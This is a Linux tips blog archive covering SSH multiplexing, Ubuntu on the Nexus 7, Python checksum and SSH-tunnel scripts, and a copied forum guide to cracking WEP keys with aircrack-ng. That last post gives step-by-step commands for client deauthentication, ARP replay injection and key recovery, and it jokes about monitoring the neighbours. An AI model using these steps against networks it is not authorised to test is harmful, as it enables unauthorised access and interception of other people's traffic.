Archive for the ‘Linux’ Category

Back to the grind – SSH Multiplexing – say wha?????

February 17, 2015

So, it’s been quite a while since I posted anything on this blog, and I thought I would get back into the swing of things. I have tons of updates but lately very little time. I think I’ll try to dedicate at least an hour a week to getting something up here, if not more.

For now, I thought I would add to the Linux tips ’n’ tricks I used to post.

SSH Multiplexing

I have known about this for quite a while but never really used it; for the past few months it’s been a life saver. On average, during the course of my workday I’m accessing 5-10 systems. This results in an ugly infestation of terminal windows, which surprisingly I have mastered the art of organizing thanks to tmux.

Anyway, what this allows you to do is use one TCP connection for each server you connect to. Any additional SSH sessions you start from your client reuse the connection that is already established, cutting your login time in half.

Modify your existing ~/.ssh/config file and add the following:

Host *
   ControlMaster auto
   ControlPath ~/.ssh/master-%r@%h:%p

ControlMaster auto tells ssh to try to start a master if none is running, or to use an existing master otherwise. ControlPath is the location of a socket for the ssh processes to communicate among themselves. The %r, %h and %p are replaced with your user name, the host to which you’re connecting and the port number—only ssh sessions from the same user to the same host on the same port can or should share a TCP connection, so each group of multiplexed ssh processes needs a separate socket.

That’s it!!!

To test this, initiate a single ssh connection to any server. In a new window create another ssh connection to the same server. You should immediately see a difference the 2nd time around.
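
A check to go with the config above, as an added example that is not part of the original post: the ssh_config man page recommends keeping a ControlPath in a directory that other users cannot write to, and this code expands the %r/%h/%p tokens and audits such a directory. The function names, the sample user and host, and the temporary directory standing in for ~/.ssh are assumptions made for the demo.

```python
import os
import socket
import stat
import tempfile


def expand_control_path(template, user, host, port, home):
    """Expand the %r, %h and %p tokens (and a leading ~/) of a ControlPath."""
    path = (template.replace("%r", user)
                    .replace("%h", host)
                    .replace("%p", str(port)))
    if path.startswith("~/"):
        path = os.path.join(home, path[2:])
    return path


def audit_control_dir(directory):
    """Return (findings, sockets) for the directory holding master sockets."""
    findings, sockets = [], []
    mode = stat.S_IMODE(os.stat(directory).st_mode)
    if mode & 0o022:
        findings.append("%s is mode %o: writable by group/other" % (directory, mode))
    for name in sorted(os.listdir(directory)):
        st = os.lstat(os.path.join(directory, name))
        if not stat.S_ISSOCK(st.st_mode):
            continue  # only master sockets (live or stale) are of interest
        sockets.append(name)
        if st.st_uid != os.getuid():
            findings.append("%s is owned by uid %d, not you" % (name, st.st_uid))
    return findings, sockets


def demo():
    """Constructed scenario: a temp dir plays ~/.ssh and a bound UNIX socket
    plays the master socket that ssh would create there."""
    with tempfile.TemporaryDirectory() as home:
        ssh_dir = os.path.join(home, ".ssh")
        os.mkdir(ssh_dir)
        path = expand_control_path("~/.ssh/master-%r@%h:%p",
                                   "sfeole", "example.com", 22, home)
        master = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        master.bind(path)
        try:
            os.chmod(ssh_dir, 0o777)   # deliberately too open
            loose, sockets = audit_control_dir(ssh_dir)
            os.chmod(ssh_dir, 0o700)   # what ~/.ssh should be
            tight, _ = audit_control_dir(ssh_dir)
        finally:
            master.close()
        return loose, tight, sockets


if __name__ == "__main__":
    print(demo())
```

Any process running as you can reuse an open master connection without authenticating again, so `ssh -O exit <host>` is worth running when you are finished with a host.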

I would like to thank the Linux Journal for this cool tip, I had a 5 year old bookmark that I stumbled over a few months back that got me hooked.   You can find it Here

For now, I’m off, check back later.

Ubuntu 13.04 now available for the Google Nexus 7

December 7, 2012

Hey All,

Nexus7 Running Raring 13.04

Today was the official announcement for the Nexus 7 supporting 13.04, for all you Nexus 7 users that may have missed today’s Ubuntu meeting on Freenode.

This week we announced that the 13.04 build is available for download. New features include:

Added the oem installer, so no more preinstalled images!! Users can select their desired Language / Time Zone and Username

The ubuntu-installer-nexus7 was recently updated to rev 1.7; this new version now flashes the 13.04 daily builds.
For those of you that may not have the installer, you can go grab it @ https://launchpad.net/~ubuntu-nexus7/+archive/ubuntu-nexus7-installer

If some of you want to dist-upgrade from 12.10 -> 13.04 then you may hit some known issues.

Please refer to the following bugs:

http://pad.lv/1087295
http://pad.lv/1087335

These are the only bugs I found when dist-upgrading. We are urging everyone to re-flash if you don’t want to deal with the workarounds.

Serial Debug is a new feature that was recently added for 13.04, to enable and use, simply plug the usb cable into the Nexus7, connect to your computer and via a terminal type:

  • “screen /dev/ttyACM0 115200”

This should drop you into a login prompt. To kill, issue “ctrl-a k”

Refer to the wiki for more info @ https://wiki.ubuntu.com/Nexus7/

Enjoy!
-Sean


Generating a clean MD5 Sum check file in python3

October 18, 2012

This week I was stuck on a small problem that required me to generate hash sums for validation. I’ve been working on an automation project at work focused on creating 100% hands-free testing tools. Part of my test called for some basic procedures, but I wanted to verify the integrity of the data. The original script that I was updating was written in Bash. Pretty straightforward, but still room for improvement! I decided to revise the script and convert it to Python, which also makes for a more powerful tool given the versatility Python has over simple Bash scripts. src and dst are 2 parameters that are set elsewhere in the script. Essentially they are strings pointing to a path on your hard disk, for example dst = "/tmp/blah/blah/"


import os
import shutil
import subprocess

def prepimage(src, dst):
    '''
    Obtain sample files
    '''
    filename = "%s/md5sum.txt" % (dst)
    md5path = "%s/" % (dst)
    print ("Copying data and Generating md5sums")
    if not os.path.exists(dst):
        shutil.copytree(src, dst)

    #Generate md5sums
        list = subprocess.check_output(["ls", dst],universal_newlines=True)
        plist = list.split('\n')[0:2]
        f = open(filename, "wt")
        for item in plist:
           out = subprocess.Popen(['md5sum', item], universal_newlines=True\
                 , stdout=subprocess.PIPE, cwd='%s' % dst).communicate()[0]
           f.write(out)
        f.close()
    return 0

Lines 7 – 9 of the function (counting from the def line) simply create my directory if it doesn’t exist.

We start @ Line 12,

list = subprocess.check_output(["ls", dst],universal_newlines=True)
        plist = list.split('\n')[0:2]

Using subprocess.check_output we kick off an "ls" command. dst is an argument that we set earlier pointing to a random directory. This will now give us output of something like this:

'How fast.ogg\nJosh Woodward – Swansong.ogg\nmd5sum.txt\n'

The 2nd line splits the string on the delimiter \n and keeps the first two entries, giving us:

['How fast.ogg', 'Josh Woodward – Swansong.ogg']

Now using this list, we can create a new file as I do in line 14 and kick off a for loop to run md5sum against each entry in the list and write the output to our new file. The final output will look just like this:

cat /tmp/optical-test/Ubuntu_Free_Culture_Showcase/md5sum.txt
6e34a2a0eaa61748ba3a33015a84e813  How fast.ogg
c9459a907b9345b289ba6c9e6517d4c2  Josh Woodward – Swansong.ogg

On the flip side, you can automate the integrity check by creating a new function and adding:


import subprocess

#Verify md5checksum
checkoutput = subprocess.Popen(['md5sum', '-c', 'md5sum.txt'],
                               universal_newlines=True, stdout=subprocess.PIPE,
                               cwd='/media/CDROM/').communicate()[0]
print (checkoutput)

Which should output:

How fast.ogg: OK

Josh Woodward – Swansong.ogg: OK

 

—————————————————————————————–

Python 3 can also use hashlib to generate the hash sum. If you don’t need a checksum file, then here’s some alternate code you can use!

import hashlib
...
...
filename = "/tmp/file1.txt"
...
file = open(filename, 'rb')
filedata = file.read()
file.close()
md5 = hashlib.md5()
md5.update(filedata)
md5sum = md5.hexdigest()
print (md5sum)

This would generate just the hashsums:

6e34a2a0eaa61748ba3a33015a84e813
c9459a907b9345b289ba6c9e6517d4c2
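
Combining the two approaches above, here is an added example (not part of the original post) that uses hashlib alone to write a checksum file in the format `md5sum -c` reads and then verify it, reading files in chunks and coping with spaces in file names. The function names and the sample files are constructed for the demo; passing algo="sha256" produces a file that `sha256sum -c` accepts, which is the better choice when the concern is tampering rather than a bad copy.

```python
import hashlib
import os
import tempfile


def file_digest(path, algo="md5", chunk_size=65536):
    """Hash a file in fixed-size chunks so large files never sit in memory."""
    h = hashlib.new(algo)
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def write_checksum_file(directory, sumfile="md5sum.txt", algo="md5"):
    """Write '<hex>  <name>' lines for every regular file in directory,
    skipping the checksum file itself. Returns the names that were hashed."""
    names = sorted(
        n for n in os.listdir(directory)
        if n != sumfile and os.path.isfile(os.path.join(directory, n))
    )
    with open(os.path.join(directory, sumfile), "wt") as out:
        for name in names:
            digest = file_digest(os.path.join(directory, name), algo)
            out.write("%s  %s\n" % (digest, name))
    return names


def verify_checksum_file(directory, sumfile="md5sum.txt", algo="md5"):
    """Return {name: status}. OK and FAILED mirror what md5sum -c prints;
    MISSING is this example's own label for a file that is gone."""
    results = {}
    with open(os.path.join(directory, sumfile), "rt") as fh:
        for line in fh:
            line = line.rstrip("\n")
            if not line:
                continue
            expected, name = line.split("  ", 1)  # names may contain spaces
            path = os.path.join(directory, name)
            if not os.path.isfile(path):
                results[name] = "MISSING"
            elif file_digest(path, algo) == expected:
                results[name] = "OK"
            else:
                results[name] = "FAILED"
    return results


def demo():
    """Constructed sample data: two small files, one altered after hashing."""
    with tempfile.TemporaryDirectory() as d:
        for name, data in (("How fast.ogg", b"sample-a"),
                           ("Swansong.ogg", b"sample-b")):
            with open(os.path.join(d, name), "wb") as fh:
                fh.write(data)
        write_checksum_file(d)
        before = verify_checksum_file(d)
        with open(os.path.join(d, "Swansong.ogg"), "ab") as fh:
            fh.write(b"!")  # simulate a bad copy
        after = verify_checksum_file(d)
        return before, after


if __name__ == "__main__":
    print(demo())
```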

Connecting to an IRC server behind a firewall? I feel your pain!

September 29, 2012

So I use Xchat daily and connect to a private IRC server to talk with my colleagues. I also have a BIP server in the office to record all of the IRC transcripts; this way I never miss any conversations regardless of the time of day. Because the BIP server is behind a firewall on the company’s network I can’t access it from the outside. For the past year I’ve been working around this by connecting to my company’s firewall via ssh and creating a SOCKS tunnel, then simply directing xchat to talk through my local SOCKS proxy.

To do this, open a terminal and issue:

ssh -CND <LOCAL_IP_ADDRESS>:<PORT> <USER>@<SSH HOST>

Ex: ssh -CND 192.168.1.44:9999 sfeole@companyfirewall.com

Starting ssh with -CND:

‘D’ specifies local “dynamic” application-level port forwarding. This works by allocating a socket to listen on a port on the local side, optionally bound to the specified bind_address. ‘C’ adds compression to the data stream, and ‘N’ tells ssh not to execute a remote command, so the session is used only for forwarding.

192.168.1.44 is my IPv4 address. Because the listener is bound to that address rather than to 127.0.0.1, other hosts on the same network can reach the proxy port too.

9999 is the local port I’m going to open and direct traffic through

After the SSH tunnel is open I now need to launch xchat, navigate to Settings -> Preferences -> Network Setup and configure xchat to use my local IP (192.168.1.44) and local port (9999) then press OK then Reconnect.

I should now be able to connect to the IRC server behind the firewall. Usually I run through this process a few times a day, so it becomes somewhat of a tedious annoyance after a while.

Recently I finished a cool python3 script that does all of this in one quick command.

The following code will do the following:

1.) identify the ipv4 address of the interface device you specify

2.) configure xchat.conf to use the new ipv4 address and port specified by the user

3.) open the ssh tunnel using the SSH -CND command from above

4.) launch xchat and connect to your server (assuming you have it set to auto connect)

To use it simply run

$./xchat.py -i <interface> -p <port>

ex: $./xchat.py -i wlan0 -p 9999

The user can select wlan0 or eth0 and of course their desired port. When you’re done with the tunnel, simply issue <Ctrl-C> to kill it and voilà!

https://code.launchpad.net/~sfeole/+junk/xchat

#!/usr/bin/env python3
#Sean Feole 2012,
#
#xchat proxy wrapper, for those of you that are constantly on the go:
#   --------------  What does it do? ------------------
# Creates a SSH Tunnel to Proxy through and updates your xchat config
# so that the user does not need to muddle with program settings

import signal
import shutil
import sys
import subprocess
import argparse
import re
import time

proxyhost = "myhost.company.com"
proxyuser = "sfeole"
localusername = "sfeole"

def get_net_info(interface):
    """
    Obtains your IPv4 address
    """

    myaddress = subprocess.getoutput("/sbin/ifconfig %s" % interface)\
                .split("\n")[1].split()[1][5:]
    if myaddress == "CAST":
        print ("Please Confirm that your Network Device is Configured")
        sys.exit()
    else:
        return (myaddress)

def configure_xchat_config(Proxy_ipaddress, Proxy_port):
    """
    Rewrites the proxy host and port in your current xchat.conf
    """

    conf_path = "/home/%s/.xchat2/xchat.conf" % localusername
    # Read the whole file first, then rewrite it in place. This avoids
    # staging the copy at a fixed, predictable name in world-writable /tmp.
    with open(conf_path, "r") as in_file:
        lines = in_file.readlines()
    with open(conf_path, "w") as output_file:
        for line in lines:
            line = re.sub(r'net_proxy_host.+', 'net_proxy_host = %s'
                     % Proxy_ipaddress, line)
            line = re.sub(r'net_proxy_port.+', 'net_proxy_port = %s'
                     % Proxy_port, line)
            output_file.write(line)

def ssh_proxy(ProxyAddress, ProxyPort, ProxyUser, ProxyHost):
    """
    Create SSH Tunnel and Launch Xchat
    """

    ssh_address = "%s:%i" % (ProxyAddress, ProxyPort)
    user_string = "%s@%s" % (ProxyUser, ProxyHost)
    ssh_open = subprocess.Popen(["/usr/bin/ssh", "-CND", ssh_address,
                 user_string], stdout=subprocess.PIPE, stdin=subprocess.PIPE)

    time.sleep(1)
    print ("")
    print ("Kill this tunnel with Ctrl-C")
    time.sleep(2)
    subprocess.call("xchat")
    # Wait for the tunnel to exit (Ctrl-C) rather than busy-polling
    ssh_open.wait()

def main():
    """
    Core Code
    """

    parser = argparse.ArgumentParser()
    parser.add_argument('-i', '--interface',
                        help="Select the interface you wish to use",
                        choices=['eth0', 'wlan0'],
                        required=True)
    parser.add_argument('-p', '--port',
                        help="Select the internal port you wish to bind to",
                        required=True, type=int)
    args = parser.parse_args()

    proxyip = (get_net_info("%s" % args.interface))
    configure_xchat_config(proxyip, args.port)
    print (proxyip, args.port, proxyuser, proxyhost)

    ssh_proxy(proxyip, args.port, proxyuser, proxyhost)

if __name__ == "__main__":
    sys.exit(main())

Refer to the launchpad address above for more info.

Simple Python3 Code to parse your ipaddress

September 27, 2012

I’ve been doing some side projects on my own requiring me to obtain my assigned IPv4 address.  In python3 you can do this by importing socket, which I believe is a better way than how I’m doing it below, however I found that using subprocess solved the issue!

I just put this together tonight and it does exactly what I wanted it to do. Feel free to copy and use it for your own little projects, you will need to add additional logic to the parser for additional network interfaces.

#!/usr/bin/env python3

import sys
import subprocess
import argparse

def get_net_info(interface):
    myaddress = subprocess.getoutput("/sbin/ifconfig %s" % interface)\
                .split("\n")[1].split()[1][5:]
    if myaddress == "CAST":
        print ("Please Confirm that your Network Device is Configured")
        sys.exit()
    else:
        return (myaddress)

def main():
#Parser Code
    parser = argparse.ArgumentParser()
    parser.add_argument('-i', '--interface',
                        help="Select the interface you wish to use",
                        choices=['eth0', 'wlan0'],
                        required=True)
    args = parser.parse_args()

#    print ("%s" % args.interface)
    print (get_net_info("%s" % args.interface))

if __name__ == "__main__":
    sys.exit(main())

Here’s the expected output. In the event the device in question is NOT configured (unplugged/unplumbed), the following should output:

sfeole@sfmadmax:~/pythonscript$ ./sean3.py -i eth0
Please Confirm that your Network Device is Configured

And here is the expected output when the device is configured (plugged in and plumbed):

sfeole@sfmadmax:~/pythonscript$ ./sean3.py -i wlan0
192.168.1.44

And of course, invalid arguments…

sfeole@sfmadmax:~/pythonscript$ ./sean3.py -i www
usage: sean3.py [-h] -i {eth0,wlan0}
sean3.py: error: argument -i/--interface: invalid choice: 'www' (choose from 'eth0', 'wlan0')
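
The slice `.split("\n")[1].split()[1][5:]` in get_net_info(), both here and in the xchat wrapper above, depends on the older net-tools layout (`inet addr:…`). The following added example (not the original author's code) parses both that layout and the newer one with a regex and validates the address before it would be handed to ssh or written to xchat.conf. The sample ifconfig outputs are constructed, and parse_ipv4 and original_slice are hypothetical names.

```python
import ipaddress
import re

# Constructed samples of `ifconfig <iface>` output (not captured from a host).
OLD_STYLE = """\
wlan0     Link encap:Ethernet  HWaddr 00:11:22:33:44:55
          inet addr:192.168.1.44  Bcast:192.168.1.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
"""
NEW_STYLE = """\
wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.1.44  netmask 255.255.255.0  broadcast 192.168.1.255
        ether 00:11:22:33:44:55  txqueuelen 1000  (Ethernet)
"""
UNCONFIGURED = """\
eth0      Link encap:Ethernet  HWaddr 00:11:22:33:44:66
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
"""

# "inet " followed by an optional "addr:" prefix; "inet6" lines never match.
INET_RE = re.compile(r"^\s*inet (?:addr:)?(\d{1,3}(?:\.\d{1,3}){3})\b",
                     re.MULTILINE)


def original_slice(ifconfig_output):
    """The post's expression, reproduced to show what it returns per layout."""
    return ifconfig_output.split("\n")[1].split()[1][5:]


def parse_ipv4(ifconfig_output):
    """Return the interface's IPv4 address as a string, or None if the
    interface has no address or the captured text is not a valid address."""
    match = INET_RE.search(ifconfig_output)
    if match is None:
        return None
    try:
        return str(ipaddress.IPv4Address(match.group(1)))
    except ValueError:
        return None


if __name__ == "__main__":
    for label, text in (("old", OLD_STYLE), ("new", NEW_STYLE),
                        ("unconfigured", UNCONFIGURED)):
        print(label, repr(original_slice(text)), repr(parse_ipv4(text)))
```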

Ubuntu 12.10 Amazon Search, HOW TO REMOVE

September 24, 2012

So it’s been quite a long time since my last post. Frankly I’ve been busy with work/personal life, spending time with my little girl and catching up on random chores in and out of the house. Everyone can relate I’m sure.

Well, so new info!! Some of you know that the Ubuntu 12.10 Quantal Quetzal release is right around the corner. I’ve been using it since Beta1 and I have to say it’s coming along nicely. A new feature that has some users in an uproar is the Amazon Search feature in Dash. Whenever searching for new items using the Search Lens the system will now poll results from Amazon.com.

Here’s an example:

I search for Music and note the results from Amazon which populate in as I wait…

To Remove this, Open a Terminal Window <Ctrl-Alt-T>

$sudo apt-get remove unity-lens-shopping

Log out and log back in, then search for MUSIC again

All Fixed.

Hope this helps!! And enjoy the new 12.10 features!

Aircrack-NG, monitor wireless traffic on your network, heck… monitor your neighbors ;)

March 8, 2012

So I wanted to show users how to sniff out their local wireless traffic, capture it and decrypt it. However, before I made up a long-winded post I decided to research it and see if someone else had done the work already. Sure enough someone has, so take a look at the following link. The article is geared toward identifying wireless security holes and exploiting them. But I’ll let you read the rest. It’s not advanced stuff; you can learn more about aircrack-ng if still interested.

I’ve copied the poster’s contents here, if you don’t want to deal with the link. If you want the screenshots, you’ll have to sign into the forums.

GENERAL INFORMATION:
Generally speaking there are 3 types of attacks:

1. Brute force attack
2. Dictionary attack
3. Statistical attack

By exploiting several security weaknesses of the WEP protocol Aircrack NG makes use of a statistical method to recover WEP keys. Provided that you have collected a sufficient number of IVs (= Initialization Vectors) and depending on the length of the encryption key, determining the actual WEP key will take less than a minute on a common PC.

HARDWARE:
I assume that you have successfully patched the driver for your wireless adapter (e.g. Ralink chipset), so I won’t go into this. I have tested packet injection and decryption with:

1. Intel® PRO/Wireless 2200BG (IPW2200)
2. Linksys WUSB54G V4.0 (RT2570)

I recommend “Linksys WUSB54G V4.0” as it has a decent reception and reasonable performance. If you need help patching & compiling from source, feel free to post your problems here as well.

DRIVERS & PATCHES:
Before you proceed you need to compile your own drivers & install patches for packet re-injection. You find instructions here.

PREREQUISITES:
1. You have successfully patched your wireless driver (see link above).
2. This HOWTO was written for Aircrack-NG v0.9.1 & Aircrack-PTW v1.0.0 on Kubuntu Feisty Fawn 7.04 (32-bit).
3. '00:09:5B:D7:43:A8' is the MAC address of my network, so you need to replace it with your own.
4. '00:00:00:00:00:00' is the MAC address of the target client, NOT that of your own wireless card.

COMMAND LINE:
Please make sure that you stick to the exact sequence of actions and pay attention to section on MAC filtering.

  • 1. Enable monitoring with “airmon-ng” (screenshot #1):
    Quote:
    sudo airmon-ng start <interface> <channel>
  • 2. Packet capturing with “airodump-ng” (screenshot #2):
    Quote:
    sudo airodump-ng --channel <channel> --write <file_name> <interface>

    Alternatively, try this (to collect data from target network only and hence increase performance):

    Quote:
    sudo airodump-ng --channel <channel> --bssid 00:09:5B:D7:43:A8 --write <file_name> <interface>

    NOTE:
    --channel… Select preferred channel; optional, however, channel hopping severely impacts and thus slows down collection process.
    --bssid… MAC address of target access point; optional, however, specifying access point will improve performance of collection process.
    --write… Preferred file name; mandatory field (in our case).

  • 3.1. Now check if MAC filtering is enabled or turned off:
    Quote:
    sudo aireplay-ng -1 0 -e <target_essid> -a 00:09:5B:D7:43:A8 -h MY:MA:CA:DD:RE:SS <interface>

    NOTE:
    -1… ‘0’ deauthenticates all clients.
    -e… ESSID of target access point.
    -a… MAC address of target access point.
    -h… MAC address of your choice.

  • 3.2. If the resulting output looks like this…
    Quote:
    18:22:32 Sending Authentication Request
    18:22:32 Authentication successful
    18:22:32 Sending Association Request
    18:22:32 Association successful 🙂

    …then MAC filtering is turned off & you can continue following section ‘No MAC filtering’, otherwise jump to section ‘MAC filtering’.

>> No MAC filtering <<

  • 4. Packet Re-injection with “aireplay-ng” (screenshot #4):
    Quote:
    sudo aireplay-ng -3 -b 00:09:5B:D7:43:A8 -h MY:MA:CA:DD:RE:SS <interface>

    You’ll now see the number of data packets shooting up in ‘airodump-ng’. This process can take up to five minutes before you start receiving any ARP requests. So be a little patient at this point. As MAC filtering is off, use an arbitrary MAC address (‘MY:MA:CA:DD:RE:SS’).

    Continue with #6.

    NOTE:
    -3… Standard ARP-request replay.
    -b… MAC address of target access point.
    -h… MAC address of your choice.

>> MAC filtering <<

  • 4. Deauthentication with “aireplay-ng” (screenshot #3):
    Quote:
    sudo aireplay-ng -0 5 -a 00:09:5B:D7:43:A8 -c 00:00:00:00:00:00 <interface>

    NOTE:
    -0… Number of deauthentication attempts.
    -a… MAC address of target access point.
    -c… Client MAC address.

  • 5. Packet Re-injection with “aireplay-ng” (screenshot #4):
    Quote:
    sudo aireplay-ng -3 -b 00:09:5B:D7:43:A8 -h 00:00:00:00:00:00 <interface>

    You’ll now see the number of data packets shooting up in ‘airodump-ng’. This process can take up to five minutes before you start receiving any ARP requests. So be a little patient at this point.

    NOTE:
    -3… Standard ARP-request replay.
    -b… MAC address of target access point.
    -h… Client MAC address.

  • 6. Decryption with “aircrack-ng” & “aircrack-ptw” (screenshot #5):
    Aircrack-ng:
    Quote:
    sudo aircrack-ng <file_name>.cap

    Aircrack-PTW:

    Quote:
    ./aircrack-ptw <file_name>.cap

CAPTURING:
This is a summary based on information given here and there, respectively:

Aircrack-NG:
64-bit key: ~250,000 packets
128-bit key: ~1,500,000 packets

Aircrack-PTW:
64-bit key: ~20,000 packets [estimate]
128-bit key: ~85,000 packets

FINALLY:
That’s it. I am open for further suggestions and hope to gain as much input as possible so that we can improve this guide and at the same time, keep it as simple as possible for other users.
